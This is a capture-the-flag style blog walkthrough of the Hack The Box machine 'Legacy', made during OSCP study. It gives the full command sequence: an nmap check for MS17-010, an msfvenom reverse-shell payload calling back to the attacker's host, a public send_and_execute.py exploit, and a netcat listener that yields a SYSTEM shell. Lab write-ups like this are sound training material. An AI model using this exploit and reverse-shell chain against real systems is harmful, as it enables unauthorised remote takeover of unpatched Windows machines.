My PWK lab access has ended, but I haven’t stopped preparing for the upcoming OSCP examination. I’ve been practicing on the HTB labs to sharpen my skills, and working on writing buffer overflow exploits so that I’m more comfortable with the process. I hope to write more tutorials once I’ve finished my OSCP journey, but for now I’m focusing primarily on studying.
That doesn’t mean I’m going to leave you all high and dry, though. Nope! Today I’m posting my walkthrough of the HTB machine called “Legacy.”
Scans revealed ports 139 and 445 open, and a quick
nmap script scan reveals that the host is vulnerable to a Remote Code Execution (RCE) vulnerability:
root@haxys:/htb# nmap -sT -p 139,445 -PN --script smb-vuln-ms17-010 10.10.10.4 Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-11 14:12 EDT Nmap scan report for 10.10.10.4 Host is up (0.067s latency). PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds Host script results: | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ Nmap done: 1 IP address (1 host up) scanned in 0.84 seconds
I discovered a blog post that directed me to a script (from this GitHub repo) which exploits the
MS17-010 vulnerability without relying on
Metasploit. I downloaded the script and saved it as
send_and_execute.py. I also downloaded a required library and saved it as
mysmb.py, in the same directory.
The exploit works much like its name implies: it sends an executable file to the target, then tells the target to run the file as the
System user. I would need to create a payload to send to the target.
msfvenom, I crafted a reverse-TCP payload:
root@haxys:~/htb# msfvenom -p windows/shell_reverse_tcp -f exe -a x86 \ > --platform windows -o payload.exe LPORT=443 \ > LHOST=10.10.14.22 EXITFUNC=thread No encoder or badchars specified, outputting raw payload Payload size: 324 bytes Final size of exe file: 73802 bytes Saved as: payload.exe
With preparations complete, I started a
netcat listener on port 443, then ran the exploit:
root@haxys:~/htb# python send_and_execute.py 10.10.10.4 payload.exe Trying to connect to 10.10.10.4:445 Target OS: Windows 5.1 Using named pipe: browser Groom packets attempt controlling next transaction on x86 success controlling one transaction modify parameter count to 0xffffffff to be able to write backward leak next transaction CONNECTION: 0x81e16da8 SESSION: 0xe1b25310 FLINK: 0x7bd48 InData: 0x7ae28 MID: 0xa TRANS1: 0x78b50 TRANS2: 0x7ac90 modify transaction struct for arbitrary read/write make this SMB session to be SYSTEM current TOKEN addr: 0xe1bc3278 userAndGroupCount: 0x3 userAndGroupsAddr: 0xe1bc3318 overwriting token UserAndGroups Sending file XX2NUF.exe... Opening SVCManager on 10.10.10.4..... Creating service xFDj..... Starting service xFDj..... The NETBIOS connection with the remote host timed out. Removing service xFDj..... ServiceExec Error on: 10.10.10.4 nca_s_proto_error Done
netcat, I had a shell. However, I couldn’t confirm that I was logged in as
root@haxys:~/htb# nc -vnlp 443 listening on [any] 443 ... connect to [10.10.14.22] from (UNKNOWN) [10.10.10.4] 1030 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>whoami whoami 'whoami' is not recognized as an internal or external command, operable program or batch file. C:\WINDOWS\system32>echo %username% echo %username% %username%
I used the
send_and_execute.py script a second time, sending over the
whoami.exe program found in the
/usr/share/windows-binaries/ directory of Kali:
root@haxys:~/htb# python send_and_execute.py 10.10.10.4 /usr/share/windows-binaries/whoami.exe Trying to connect to 10.10.10.4:445 Target OS: Windows 5.1 <...> Sending file CYVONX.exe... <...> Done
The file was uploaded as
CYVONX.exe and stored in the
C: root directory. The program informed me that I was running as
C:\WINDOWS\system32>cd C:\ cd C:\ C:\>CYVONX.exe CYVONX.exe NT AUTHORITY\SYSTEM
From there, it was a simple matter to obtain the user and root flags:
C:\>cd "C:\Documents and Settings\john\Desktop" cd "C:\Documents and Settings\john\Desktop" C:\Documents and Settings\john\Desktop>ipconfig ipconfig Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 10.10.10.4 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 10.10.10.2 C:\Documents and Settings\john\Desktop>type user.txt type user.txt e69af0e4f443de7e36876fda4ec7644f C:\Documents and Settings\john\Desktop>cd ..\..\Administrator\Desktop cd ..\..\Administrator\Desktop C:\Documents and Settings\Administrator\Desktop>type root.txt type root.txt 993442d258b0e0ec917cae9e695d5713
This is probably the easiest box on HTB.
MS17-010 is a well-known, widely-publicized vulnerability with weaponized exploits built into Kali. However, it seems that most people prefer to use
Metasploit to exploit the vulnerability. Learning how to exploit the system without
Metasploit was a handy and useful lesson. In fact, when I was first exploring this vulnerability, I found one system that
nmap reported as vulnerable, but which
Metasploit couldn’t crack. By using the manual exploit, I was able to gain access to the machine and capture the flags.
This is why I always look for manual exploits. If you use
Metasploit for everything, then all you’re doing is learning how to use
Metasploit. But if you seek out manual exploitation methods, you learn more about how the vulnerabilities and exploits work. That way, when
Metasploit fails you, you’re not totally lost.